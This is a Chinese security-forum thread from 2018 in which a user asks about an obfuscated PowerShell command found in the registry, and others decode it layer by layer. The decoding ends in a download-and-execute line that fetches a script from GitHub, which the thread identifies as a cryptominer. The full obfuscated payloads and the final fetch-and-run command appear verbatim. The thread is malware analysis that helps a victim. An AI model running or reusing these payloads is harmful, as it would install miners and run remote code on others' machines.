收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 软件区 解疑答难区 系统cpu 99%,有cmd命令执行
返回列表 发新帖
查看: 2056|回复: 6
收起左侧

[系统] 系统cpu 99%,有cmd命令执行

[复制链接]
yj2371
发表于 2018-4-22 15:47:10 | 显示全部楼层 |阅读模式

  2. cmd.ExE/cc:\winDowS\sYsWOw64\wInDOWSpoWershELl\v1.0\pOwERSHeLl.exE ".((gV '*mdR*').nAME[3,11,2]-JoiN'') ("$(SET-vaRiAble 'OFs' '' )" + [stRiNG]('20h26y20h28-20l24z70n73z48q4fl4dh65z5bl34z5dy2bh24n70l73q68-6fy6d-65y5bq33h30-5dy2by27l58u27q29l20n28h20q5bl53u54-72-69-6eh47z5dl3al3ay6au4f-69n4ey28z27h27l20-2cy20z28l20u28u34h30y20u2cu20y33u32h20n2cy31z31n30n20u2cz31l30n31y2cl20z38l37y2cz34l35-2ch20h37l39n20u2cz36z36q20y2cy20q31h30l36l2cl20h36y39-20u2cu20z36h37y20q2cz20n38y34y2ch33z32-2ch20z33n32n20z2cl20y37-33z2cn37y39h2cu20y34y36-2c-20q36l37n20n2cl20q31h31h31-20-2cn20-31u30-39h2c-20l38z30h20l2cl38l32q2cy20n31q30-31l2c-38q33h2cl38z33h20u2cz37z33-20l2cz20q37-39l20l2cu37h38q2cz34q36-2cu31l30y30n2cy36-39n20z2ch20l31u30q32z20-2cl31h30h38l20h2cu20q36z35n2c-38q34n20q2cq31-30y31-20h2cn31z31l35h2c-20q38y34y20z2cu20q31n31h34h2cq36y39y2cq36u35q20u2cl37-37z2c-34y30y2ch20l33l32q20l2c-20l39n31y2cq20n31y31l35q2cn20l38-39q2cl20h38y33h20q2cq38n34h20l2ch20y31y30l31q2cz31z30z39u2cz34y36l2c-31u30z35l2cy31u31u31z20l2cl34h36u2cl20l37l37l20h2cq36-39y20y2cy20l31u30q39n2cl37y39-2ch20h31y31z34h2cq38y39l2ch20n38z33y20l2cy20q31y31n36h20u2cy31h31n34n2cz20u36h39y2cz20y36h35h2cl37l37u20h2cq20u39l33h2cl39y31y2cu20z39u39q20u2cu20h31y31l31h2cn20n31l31h30-20l2cq38q36y20z2cn20u31h30l31q2cu20u38h32q20n2cy38y34l2cq39-33z2cq20q35h38l2cq35h38l20y2cn20-37n30z20u2c-20q31q31h34u2cz37z39y20l2c-20y37l37h20u2cu36n36y20q2cu20y39n37q20-2cy31-31-35u20u2ch31n30n31l20n2cq35y34q20z2cq20z35-32l20u2ch20-38q33h20l2cq20q38y34q20y2cq31q31u34y20l2ch31z30-35-2cl31z31y30u2cy20z37-31q20h2cu20q34h30h20q2cu20h33h39u2cy35z35n2cq20-39z38z2c-34h38n20z2cz37l32z20z2cl38q39z2c-20z36-36l2cq31h32n30y2cu20-37n34u2cl31z30q38n2cu31z30n35z20y2cu38z35y20q2ch31h30l39q2cn37l36u20h2cz20u35z30n20q2cu20l35u31y2cz37u35-20z2cy20z31h30u31h2cq35-31z2cz20z35q37y20z2ch37z35n20n2cz35-37q20l2cn20q38h35-20q2cn31y31u34q20l2cq38u38z2cn20u35q32h20l2c-20l37q32u2cy20y38q33u2c-20-31-30z34y2cn20-36q37z2cu37y33y2cl20n36y36-2cu20z31z30h33h20u2cl36z39z2cn31-32u31z20l2ch38n34z20-2cn38y39y2cz20n31z30-37u20q2cq36h39n2cq36u35u20n2cz38q31q20-2cz35q35h2c-37n37z2c-37-31u2cq20n37l33u2cu20y31y32q32y20h2ch20n31l30q31u2cy20u39z37u20h2cu38h33l2c-35l35h2cu20n36n36h2ch34-39-20-2cy20n31h31n32-20-2cu20y38h32q20-2ch20h31-32-31q20h2cn20l37n37h2ch31n31n32q2cq31y31h33y2cn20q31-32y31z20z2cy20y31l31q33n20y2cn36q36h20-2cu31l32h31z20-2ch31l30h39n2cl20-38-36n20-2cy20n38z37l2cy20z39-30y20u2cu20z38z36n20y2ch34q39q20n2cl31z30q39-2ch37u30y2cq20u31-30q37h2ch20y36l38u2cy37q37q2c-20u35z35u20h2cl20-39h30l2cq35q30-20z2cl35z36l20u2cy20l35z37y20q2cq20h35-37u2cz35h33u20y2cu20z35z35y20q2cq35q35n20z2c-20u35h35-2cl35q31u20z2cy20q35u31z20u2ch35h31n20-2cl20q31h31y30u20z2c-31h31n38q20-2cq31l31y38n2ch31y31n38q2cy20-31l30q32u20y2cu20h31h30z31h2cl35h34h20q2cq37z39h2cn20q35h33z2cz20l34q39u20h2cy37z39n20y2cu20-37y34h20n2cl20y34h37h2cn20z31u30y32q20q2cl20l31l30l32q2cu34u37z2c-31q32n32-2cq35n37n20z2cy20y39h39-20h2cl20-39z30u2cq31y30q39y20y2cn38u31l2ch36y36n20-2cl39n38u20n2cy38y30n2c-39q38u20-2cz20u37q39y2cl38l33n2cn31y31h36u2c-31-31q34u20y2c-37h34q20-2cn20y31z31-30-20u2cl20-31h30n35-2cn37-31n20n2cq20-36u35q2ch31l31z33y2cu31q31h35q2cq20y31z30z33q20-2cz31q30u32n20u2ch38z30l20h2cq20-35u31h20q2c-35l33y20n2cq20l35-36q2cz37y32n20-2cq20-31z32u32h20z2cu35u36y2cn31-30z35-2cq20n31-32q32q2cl20z31h30h37z2cn20h35y33y2cq20z34z37h20q2cn20q35h35y2cz20l35u34z2cn20q34-38-2cu20u38y38y20l2cn34y33n2cl20h31y30u30-2c-38n38-20l2c-20q35q30-20y2cz20q31u30-38l20u2cz35z33z20q2cn37l39-20-2cq20n31q30y32u20h2cq31q32z32h20y2cy20n31n31n33q20h2cq31u30n30l20n2cl20q31q31u36n2cy20y34-33l20l2cy20n31-30u35l2c-20n37h34u2cu31y31y38h2cl31-32-30y2cq20q35q37q20u2cy34n37-20-2cn20l37u38q20l2cn20h37n34q2c-31z32h31h20h2cz20y31q30n30h2cq20n31y30n38q2c-20z31l30n37z20y2cl20u38n33y20q2cu34n37y20y2cq20-39h38y20z2cz20-37n39-2cn34l33n20q2cq20y37q39-20y2cu20z31-31q30h2cn34u39y2cn31u30l30y20l2cn20h38-37-2cl31z32-31-2cz31q31n34h2cl20q37h36z20z2cu20u37h36y20u2c-20-39h30h2cq35l34z2c-35y35n2cy38-39y2c-31-31n37h2cz31n30y38-2ch31h30u34z20u2cz31u30z30h20l2cu20l39q38-20-2cq20u37z32-2cq20n35z36q2cn34l37l20q2cl39n38q20y2cn31q30n30u20-2cn20z31l31z36l20-2ch20l38l35-2cn35z36l20q2cu31z31z37z20u2c-31h31n30q20l2cl31h31z37l20n2cq20q35q31h2cu31l32-32-2cy20z31q31h33y20y2c-35h35-20l2cn37-31l2cz20-37q30y20u2cl34n38y2cq20u38z35-2cq35-35-2cn20u38l38n2cu20y34l38z2cz20u34-37h20y2cl38y37n20l2cz38q34z20q2cn38n36y20y2cq20h35q33q20h2cu38n30l2cl31z31u33l20q2cu35z30h20q2cz38u36z20-2cu20l37q36y2cn31h32q32l20y2cn20l39l39y2cz20h31y30l32h20u2cn38-34z2cn20q39h37l20q2cy31n31u30z2cz20-37q31y2cn20u35-31n20y2c-31-31q37h20-2cy20u37h34y2cu35q33h20-2cu20y39l39z20-2ch20h38z34z2c-31y30z31h20h2cy20n34n33h20n2cu35h30z2cl31-31y33u20z2c-20y34y37u20-2cn31y32h30y20l2ch31n30n30h20n2ch31y31-38z2cq31q30h39l2cq20n31z32-31l2c-31n31q37h20u2ch35h35u2c-31n32y31l2cn20u35u34z20h2cl20q31-32n31n20-2cn20z31y31-32q20z2c-31z31u35h2cu20l35q31n2cz20z31h31y34q2c-31l31q37n20u2ch20y31q31n39z2c-20l34y33u20u2ch38u37z20h2cy20n31z32-32-2cn38y31u20n2cn34h33u20n2ch20q37-35-20-2cq20q34q39l20z2cy20n38l38h2cq31y30l36h20-2c-20-38l36u2cu35h35u20h2ch37z32h20u2cl20q35u33h20n2cu35q36l20h2cy35l33n2c-34n37y20-2cy20n35q36n2cq20l36-36n2ch33-39-2ch20z33q32u20-2cz34u31y2cy33q32h20-2ch20n34-34z2cn33l32n20n2cy39z31-2c-37z33l2cq37z39h20q2cz20u34y36n20u2c-36q37n2cn20u31l31-31y20h2cn31z30l39z2cn31u31u32y2cn31z31u34h2c-36l39u2ch31l31-35n2ch31y31z35q20u2cq31-30n35l2cy37h39-2cq20u31u31l30z20h2cq34l36-2cq36y37l20-2ch20z31l31h31u20-2cq20z31u30q39h2cl20y38l30q2c-31z31l34h2cu31y30l31l20n2cu20l38z33u2cu20z38q33-2c-31u30h35z2ch20u37-39h20n2cn37l38q20n2cy37q37h2cy37q39q2c-31q30l30q20l2cq36y39h2cz39h33-20z2cu35h38z20n2c-35q38l2cn20h31y30n30-20q2cq31z30z31l20h2cu20-39q39l2cl31q31h31h20n2cz20l37l37l2cy20-31h31h32l2cu31l31q34q20l2cl31y30h31z20u2cl38y33q20u2cl31q31q35y20l2cq33q32y20u2cz20y34n31l20h2cl33q32z2cz20n31z32q34-2cu20q33l32u20u2cn20y33n37l2cn31n32z33u20l2cq31q31l30y20y2ch31q30q31l20u2cn38z37y20y2cl34z35u20q2cy37-39y2c-20n36n36l2cl31q30q36h20n2cz20z36n39u2cn36y37-20q2cn20n38n34u2ch20l33q32u20l2cl33z32h20u2c-20-31n30l35-2cu20n37l39y2cl34q36y2cu20n38n33l20h2ch20l31z31u36u20n2cy20q38h32-20l2cl20h36q39z20-2cy36l35h20q2c-37z37h20h2cu20u38l32h2cz36z39n20h2cy20q36-35u2cn20n31y30l30l20n2c-20-36q39u20l2cz20l38h32n2cl34n30q20y2cl33u36-2cq20y39l35z20q2cq20z34-34y2cu33n32z20-2cl39n31n2cz31h31n35n2cn38y39-20z2cq31n31z35z20l2cz20-31z31l36y20u2cq31h30-31n2cz20q37l37n20z2cz20z34z36h2cl38u34q2cq20h31u30l31l2cu20q38q38q2ch20u31h31h36-20y2cu34n36l20n2cy20y36q39-2ch31q31l30n2cy36n37-20y2cu31z31q31z20y2cz31-30-30l20h2cu31-30z35h20l2cy31h31u30-20y2cq37-31-2cn39z33q2cu20q35y38q2c-35l38-20n2ch36-35z2cu20n31-31q35q2c-36z37-2cq37l33l2cq20y31-30l35u2cu20h33h32q2ch20n34u31q20n2cq33u32n20n2cz31n32u35y20h2cn20y33-32z20l2cl31y32y34u20l2cz33h37n2cu33l32y20q2c-20l31-32n33h2cq20l33u32q20u2cq33u36n2cl39l35-20h2cy34u36y20u2cn38h32-2cz20h36y39z2cl20l36q35h2cy36y38-2cl31u31h36q20n2cz37z39-20-2cz36-39h2cl20y37z38h2cu20q31z30y30l20z2cz20n34h30l20l2c-20l34n31y2c-33q32y20z2cl20z31q32u35z20y2cn20u34u31n20h2cu33y32y20h2ch31l32y34-2cu33z32h20n2cl20y31n30q35y20y2cy20z31-30q31h20l2c-31q32n30-29l7cn20y66y6fh52y45h61u43y68y2dz6fz42z6ah65-63q74q7by20-28z20y5bz49l6en54y5dq24n5fu2dq41z53-20n5bu43n48-61n72n5du29-7dh20n29z20-29n20u29'.split( 'hqzyln-u' ) |fOreAcH-oBJEcT { ([char]( [CoNvERT]::toINT16(([STring]$_),16) )) } )+"$(SeT-iTeM 'varIAblE:ofs' ' ') " )"
复制代码
看到注册表里面有有个运行这个,不知道什么意思,有大神知道吗?

回复

举报

yj2371
 楼主| 发表于 2018-4-22 18:16:32 | 显示全部楼层
  1. ( new-object  io.compression.deflatestream( [system.io.memorystream][convert]::frombase64string('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8izk5/760X+dX2l5Ofzqdt+iJvx9/NJydlkS/bO+On1dWyrLLZ67YulhdbH8/bdtU8unu3zq7GF0U7X0/WTV5Pq2VLzcfTanG3uJ5cTe+2q/xdvmyu7y6yps3ruw+WzQ+K1XjV7H585/8B' ) , [io.compression.compressionmode]::decompress ) | %{new-object  io.streamreader($_, [system.text.encoding]::ascii ) } |% { $_.readtoend() }) | iex
复制代码
回复

举报

imba-tjd
发表于 2018-5-8 09:28:31 | 显示全部楼层
本帖最后由 im-t 于 2018-5-8 10:37 编辑

除了前几个字母,其他的都和cmd没关系。不过我也看不懂。
360急救箱杀毒吧

试了一下,解密3次以后会下载https://raw.githubusercontent.co ... y/master/7nszip.ps1,手动下下来,红伞和360压缩都会报毒。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

yj2371
 楼主| 发表于 2018-5-30 17:10:07 | 显示全部楼层
im-t 发表于 2018-5-8 09:28
除了前几个字母,其他的都和cmd没关系。不过我也看不懂。
360急救箱杀毒吧

已找到,属于挖矿程序
回复

举报

imba-tjd
发表于 2018-5-30 22:31:57 | 显示全部楼层
yj2371 发表于 2018-5-30 17:10
已找到,属于挖矿程序

话说2楼的代码你是怎么弄出来的
回复

举报

随便注册
发表于 2018-5-30 23:26:11 | 显示全部楼层
im-t 发表于 2018-5-30 22:31
话说2楼的代码你是怎么弄出来的

注意split( 'hqzyln-u' ),把这8个全删掉,就是ASCII的十六进制,转换一下,这回成十进制了,再转就出来了。
你是怎么解密3次的?
  1. & ( $psHOMe[4]+$pshome[30]+'X') ( [STrinG]::jOiN('' , ( (40 , 32 ,110 ,101, 87,45, 79 ,66 , 106, 69 , 67 , 84,32, 32 , 73,79, 46, 67 , 111 , 109, 80 ,82, 101,83,83 ,73 , 79 ,78,46,100,69 , 102 ,108 , 65,84 ,101 ,115, 84 , 114,69,65 ,77,40, 32 , 91, 115, 89, 83 ,84 , 101,109,46,105,111 ,46, 77 ,69 , 109,79, 114,89, 83 , 116 ,114, 69, 65,77 , 93,91, 99 , 111, 110 ,86 , 101, 82 ,84,93, 58,58 , 70 , 114,79 , 77 ,66 , 97 ,115 ,101 ,54 , 52 , 83 , 84 ,114 ,105,110, 71 , 40 , 39,55, 98,48 ,72 ,89, 66,120, 74,108,105 ,85 ,109,76 , 50 , 51,75 , 101,51, 57 ,75 ,57 , 85 ,114 ,88, 52 , 72, 83, 104, 67,73, 66, 103 ,69,121 ,84 ,89, 107 ,69,65 ,81 ,55,77,71, 73, 122 , 101, 97 ,83,55, 66,49 , 112 , 82 , 121 , 77,112,113, 121 , 113 ,66 ,121 ,109, 86 , 87, 90 , 86 ,49 ,109,70, 107, 68,77, 55 , 90,50 ,56 , 57 , 57,53 , 55 ,55 , 55,51 , 51 ,51 , 110 ,118 ,118,118, 102 , 101,54 ,79, 53, 49 ,79 , 74 , 47, 102 , 102,47,122,57 , 99 , 90,109 ,81,66 ,98 ,80,98 , 79,83,116,114 ,74 , 110 , 105,71 , 65,113,115, 103 ,102 ,80 , 51 ,53 , 56,72 , 122 ,56,105, 122, 107, 53, 47 , 55, 54, 48, 88 ,43, 100,88 , 50 , 108 ,53 ,79 , 102 ,122 , 113 ,100 , 116, 43 , 105, 74,118,120, 57 ,47 , 78 , 74,121 , 100, 108, 107 , 83 ,47 , 98 , 79,43 , 79 , 110,49,100 , 87,121,114, 76 , 76 , 90,54,55,89,117,108,104 ,100 , 98 , 72, 56,47 ,98 ,100 , 116 , 85,56 ,117 ,110 ,117 , 51,122, 113 ,55 ,71, 70 ,48, 85,55, 88, 48, 47 ,87 ,84 ,86 , 53 ,80,113 ,50 ,86 , 76,122 , 99, 102 ,84, 97 ,110, 71, 51 ,117 , 74,53 , 99 , 84,101 , 43 ,50,113 , 47 ,120 ,100 ,118,109, 121,117 ,55,121, 54 , 121 , 112 ,115, 51, 114,117 , 119, 43 ,87 , 122,81 ,43 , 75 , 49 , 88,106 , 86,55 ,72 , 53 ,56 ,53,47 , 56, 66,39, 32 ,41,32 , 44,32 ,91,73,79 , 46 ,67, 111 ,109,112,114,69,115,115 ,105,79, 110 ,46,67 , 111 , 109, 80,114,101 , 83, 83,105, 79 ,78 ,77,79,100 ,69,93 ,58 ,58, 100 ,101 , 99,111 , 77, 112,114 ,101 ,83 ,115 ,32 , 41 ,32, 124, 32 , 37,123 ,110 ,101 ,87 ,45 ,79, 66,106 , 69,67 , 84, 32 ,32 , 105, 79,46, 83 , 116 , 82 , 69 ,65 ,77 , 82,69 , 65, 100 , 69 , 82,40 ,36, 95 , 44,32 ,91,115,89 ,115 , 116 ,101, 77 , 46,84, 101, 88, 116 ,46 , 69,110,67 ,111 ,100 ,105 ,110 ,71,93, 58,58 ,65, 115,67,73, 105, 32, 41 ,32 ,125 , 32 ,124 ,37,32 , 123, 32 ,36,95 ,46 ,82, 69, 65,68,116 ,79 ,69, 78, 100 , 40 , 41,32 , 125 , 41 ,32 ,124,32 , 105 , 101 ,120)| foREaCh-oBject{ ( [InT]$_-AS [CHar])} ) ) )
复制代码
回复

举报

imba-tjd
发表于 2018-6-2 22:23:43 | 显示全部楼层
随便注册 发表于 2018-5-30 23:26
注意split( 'hqzyln-u' ),把这8个全删掉,就是ASCII的十六进制,转换一下,这回成十进制了,再转就出来 ...

就是转换到2楼的我算做解密两次
然后再继续根据它的代码
先使用Convert.FromBase64String获得byte数组
再使用System.IO.Compression的new DeflateStream(new System.IO.MemoryStream(byteArray), CompressionMode.Decompress)
Read到一个byte数组,使用System.Text.Encoding.ASCII.GetString这个静态方法
得到的是
  1. IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/iybwc/tpexensy/master/7nszip.ps1')
复制代码


回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-26 22:08 , Processed in 0.131157 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表